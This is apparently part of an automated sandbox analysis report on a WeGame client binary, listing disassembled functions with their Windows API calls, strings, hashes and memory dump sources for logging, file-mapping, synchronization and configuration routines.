                                                                • Opcode Fuzzy Hash: 501a3b880bdd0227d4ed5f3609f221c7ab62b6da0d79b99ab71675df73cf704d
                                                                • Instruction Fuzzy Hash: 2421AC75A102059FCF05DFB8C984A9DBBF5BF18314B14845DE059EB261CB39EA05CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDAF17F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDAF186
                                                                • GetSystemTimes.KERNEL32(6C09A294,6C09A29C,DgI.,00000050), ref: 6BDAF19C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6C09A294,6C09A29C,DgI.,00000050), ref: 6BDAF1A5
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDAF1C9
                                                                • DgI., xrefs: 6BDAF18D
                                                                • error, xrefs: 6BDAF1DD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@SystemTimes
                                                                • String ID: DgI.$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp$error
                                                                • API String ID: 1984077098-1526617941
                                                                • Opcode ID: edfe9072d809c16fe76344eba6b10020d074c6d5dea0dccc1a676af3ba791faa
                                                                • Instruction ID: d46da29044824568257b380932f26022ee85d15f2aff8ee0ca8f6146f455348e
                                                                • Opcode Fuzzy Hash: edfe9072d809c16fe76344eba6b10020d074c6d5dea0dccc1a676af3ba791faa
                                                                • Instruction Fuzzy Hash: 50F04030E40201ABC718A7B4DC12FAD33A04F50B28F300188E9157F2C0EF7EDA02A7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3109D Relevance: 9.1, APIs: 6, Instructions: 122synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD310A4
                                                                • WaitForSingleObject.KERNEL32(?,000000C8,?,00000078), ref: 6BD31105
                                                                • ResetEvent.KERNEL32(?), ref: 6BD3111E
                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,?), ref: 6BD3122A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: EventH_prolog3_ObjectResetSingleWaitXbad_function_call@std@@
                                                                • String ID:
                                                                • API String ID: 2241382284-0
                                                                • Opcode ID: 09eddb0c18035e9ba4e8abe9c0e0bbd46b3eeeafddf564d88c139a46cceda1a8
                                                                • Instruction ID: 550461b84213fcc73f9980e4c7c29982dcffa782e8b5c1f5378858fff09327c6
                                                                • Opcode Fuzzy Hash: 09eddb0c18035e9ba4e8abe9c0e0bbd46b3eeeafddf564d88c139a46cceda1a8
                                                                • Instruction Fuzzy Hash: 56518070D042AADBDB11DFB4C58479DFFB0BF02328F14429DC165AB692CB38A984DB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3841C Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD38423
                                                                  • Part of subcall function 6BD37B2E: UnmapViewOfFile.KERNEL32(?,?,?,6BD37389,1F5A0D44,?,?,00000000,6BF7BCF1,000000FF,?,6BD371F1,?,?,?,6BF7BC14), ref: 6BD37B42
                                                                  • Part of subcall function 6BD37B2E: CloseHandle.KERNEL32(?,?,6BD37389,1F5A0D44,?,?,00000000,6BF7BCF1,000000FF,?,6BD371F1,?,?,?,6BF7BC14,000000FF), ref: 6BD37B4B
                                                                  • Part of subcall function 6BD37B2E: CloseHandle.KERNEL32(000000FF), ref: 6BD37B5D
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,0000002C), ref: 6BD38449
                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,003000A2,00000000,00000000), ref: 6BD384A7
                                                                • MapViewOfFile.KERNEL32(00000000,00000007,00000000,00000000,003000A2), ref: 6BD384B8
                                                                • _memcpy_s.PGOCR ref: 6BD384FA
                                                                • _memcpy_s.PGOCR ref: 6BD38530
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleView_memcpy_s$H_prolog3_MappingUnmap
                                                                • String ID:
                                                                • API String ID: 998036934-0
                                                                • Opcode ID: 1343a469436bc015357746a13c29223dce927d1980980d99eb6892c732c0a557
                                                                • Instruction ID: a6cf387fa2153ac724126877d0b7a663f3f6b8a971042f265a3ba2f009e0079e
                                                                • Opcode Fuzzy Hash: 1343a469436bc015357746a13c29223dce927d1980980d99eb6892c732c0a557
                                                                • Instruction Fuzzy Hash: 4331A2B1901704EFEB24EFB4CD41FAEBB79EF05324F104669E126AB1D1D775AA048B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD38344 Relevance: 9.1, APIs: 6, Instructions: 69synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3834B
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000010,6BD3233D), ref: 6BD38365
                                                                • EnterCriticalSection.KERNEL32(?), ref: 6BD3837D
                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 6BD38395
                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 6BD383B8
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BD383F9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ObjectSingleWait$CriticalSection$EnterH_prolog3Leave
                                                                • String ID:
                                                                • API String ID: 2592546008-0
                                                                • Opcode ID: 0544c41cfa1aad0c252d2cac7e06b307af88dc6410c8c64fb0447dee4223609e
                                                                • Instruction ID: 529345b88ea96f0e0ad2378bab6b57cac1855dc05e67512b062635e5d3a17762
                                                                • Opcode Fuzzy Hash: 0544c41cfa1aad0c252d2cac7e06b307af88dc6410c8c64fb0447dee4223609e
                                                                • Instruction Fuzzy Hash: 68213D71D0462BEFCB00DFA4CD85AAEBB74BF06324F204164D521E7291D739A656DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDB4B5A Relevance: 9.1, APIs: 6, Instructions: 61filememoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000000,00000000), ref: 6BDB4B7D
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6BDB4B9B
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BDB4BA8
                                                                • ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 6BDB4BCE
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BDB4BD5
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 6BDB4BE3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseFileVirtual$AllocChangeCreateFindFreeHandleNotificationRead
                                                                • String ID:
                                                                • API String ID: 3913859839-0
                                                                • Opcode ID: 42d787213548c822b2265c3f1db50f6556d43c575f22a7f6a59b9a0a93de72c3
                                                                • Instruction ID: 3f27f0b01acb8adc2c7f46d133886dd038ea0df196f2d582b6a4a491886a88f9
                                                                • Opcode Fuzzy Hash: 42d787213548c822b2265c3f1db50f6556d43c575f22a7f6a59b9a0a93de72c3
                                                                • Instruction Fuzzy Hash: 6B01F9752D4304BBEB119B18CC89F5B376CEB86BA5F200050FB01AE180C778E8468F79
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046A091 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 297COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0046A113
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: ClientConf$Version$VersionData$VersionUpdateData
                                                                • API String ID: 356670603-449731932
                                                                • Opcode ID: 0cdd40965c03e4a8c38d2c62c560b509d0561b6d10694df48afbfcdda1cbe438
                                                                • Instruction ID: cbd8ef31e308a701159e088c47d16078411cb8f869c0bc736888bec5b6dfc327
                                                                • Opcode Fuzzy Hash: 0cdd40965c03e4a8c38d2c62c560b509d0561b6d10694df48afbfcdda1cbe438
                                                                • Instruction Fuzzy Hash: 79C1D671C04248EADB15DBA5C945BDEBBB8EF15304F20819EE051B3192EF7C5B88CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD38B59 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD38B63
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(1F5A0D44,?), ref: 6BD130E3
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,1F5A0D44,?), ref: 6BD13101
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 6BD1312B
                                                                  • Part of subcall function 6BD13BC0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(1F5A0D44,?,00000001), ref: 6BD13C9D
                                                                  • Part of subcall function 6BD13BC0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000), ref: 6BD13DB6
                                                                  • Part of subcall function 6BD13BC0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 6BD13DC3
                                                                  • Part of subcall function 6BD3B8E5: __EH_prolog3.LIBCMT ref: 6BD3B8EC
                                                                  • Part of subcall function 6BD3B8E5: __alldvrm.LIBCMT ref: 6BD3B982
                                                                  • Part of subcall function 6BD3368B: __EH_prolog3.LIBCMT ref: 6BD33692
                                                                  • Part of subcall function 6BD13BC0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,00000001,1F5A0D44,?,00000001), ref: 6BD13CFD
                                                                  • Part of subcall function 6BD13BC0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140 ref: 6BD13DD1
                                                                  • Part of subcall function 6BD13BC0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,00000001,1F5A0D44,?,00000001), ref: 6BD13D26
                                                                  • Part of subcall function 6BD13BC0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 6BD13D52
                                                                  • Part of subcall function 6BD37E09: __EH_prolog3_GS.LIBCMT ref: 6BD37E10
                                                                • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,00000000,?,?,?,?,?,?,?,?,6BD36C98,00000000,00000000), ref: 6BD38CF5
                                                                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,6BD36C98,00000000,00000000), ref: 6BD38CFE
                                                                Strings
                                                                • LOG format: [YYYY-MM-DD hh:mm:ss.xxx][tid][LEVEL][FILE(LINE)]FUNCTIONmessage, xrefs: 6BD38BE5
                                                                • log created at: , xrefs: 6BD38BD1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$V12@$?flush@?$basic_ostream@?sputc@?$basic_streambuf@H_prolog3$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_H_prolog3_H_prolog3_catch_Osfx@?$basic_ostream@V?$basic_streambuf@__alldvrm
                                                                • String ID: LOG format: [YYYY-MM-DD hh:mm:ss.xxx][tid][LEVEL][FILE(LINE)]FUNCTIONmessage$log created at:
                                                                • API String ID: 3604644337-2265546226
                                                                • Opcode ID: 2aa8d483e36078a4c509a9981eef5a953b90c1dd6c7ed275c988f7a55e4e659e
                                                                • Instruction ID: 382541c000f45c53d6d68f76af04b14c353b4abf55a90e4d90afb7ff9e89f471
                                                                • Opcode Fuzzy Hash: 2aa8d483e36078a4c509a9981eef5a953b90c1dd6c7ed275c988f7a55e4e659e
                                                                • Instruction Fuzzy Hash: 0851BF71C04258EFDB15CBF8C946BDDBBB8AF16328F644098D001AB291DB796B08CB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDD1FF6 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,1F5A0D44,?,?,00000000,?,?,6BF92740,000000FF,?,6BDD1FDE,?,?), ref: 6BDD2056
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                  • Part of subcall function 6BD447CC: __EH_prolog3.LIBCMT ref: 6BD447D3
                                                                  • Part of subcall function 6BDCF356: __EH_prolog3.LIBCMT ref: 6BDCF35D
                                                                  • Part of subcall function 6BDCF356: ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,6BDD1ACE,?,00000000,00000020,00000040,00000001,?,\mmog_data.xml,00000000,1F5A0D44,00000000,00000000,6BD43A1D), ref: 6BDCF380
                                                                  • Part of subcall function 6BDCF356: ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,00000000,00000001,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3B6
                                                                  • Part of subcall function 6BDCF356: ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3C7
                                                                  • Part of subcall function 6BDCF409: __EH_prolog3.LIBCMT ref: 6BDCF410
                                                                  • Part of subcall function 6BDD217D: __EH_prolog3_GS.LIBCMT ref: 6BDD2184
                                                                  • Part of subcall function 6BDD217D: _CxxThrowException.VCRUNTIME140(?,6C05A770,parent node is null), ref: 6BDD2225
                                                                  • Part of subcall function 6BDD217D: __EH_prolog3_GS.LIBCMT ref: 6BDD2235
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD22F7
                                                                  • Part of subcall function 6BDD217D: ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2306
                                                                  • Part of subcall function 6BDD217D: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2318
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2375
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2384
                                                                  • Part of subcall function 6BDD217D: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2393
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: V123@$?parent_path@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?wstring@path@filesystem@ierd_tgp@@W@2@@std@@$?bad@ios_base@std@@?fail@ios_base@std@@?filename@path@filesystem@ierd_tgp@@?u8to16@common@ierd_tgp@@?unsetf@ios_base@std@@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@
                                                                • String ID: ClientConf$Version$VersionData$VersionUpdateData
                                                                • API String ID: 2273524157-449731932
                                                                • Opcode ID: 3e1194a2d3d58b617c8fb2522a013e128352ef816f1ff80dde319ffc8994a66a
                                                                • Instruction ID: c45a1a2be7c75cd69db863383cd93ce1d8c46adcf6e52f728edd2f0a4d2a07a1
                                                                • Opcode Fuzzy Hash: 3e1194a2d3d58b617c8fb2522a013e128352ef816f1ff80dde319ffc8994a66a
                                                                • Instruction Fuzzy Hash: 68416D71D04248EADB05DBB9D845FDEBBB8EF18318F1080ADE145AB290DB796B44CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00453FD5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
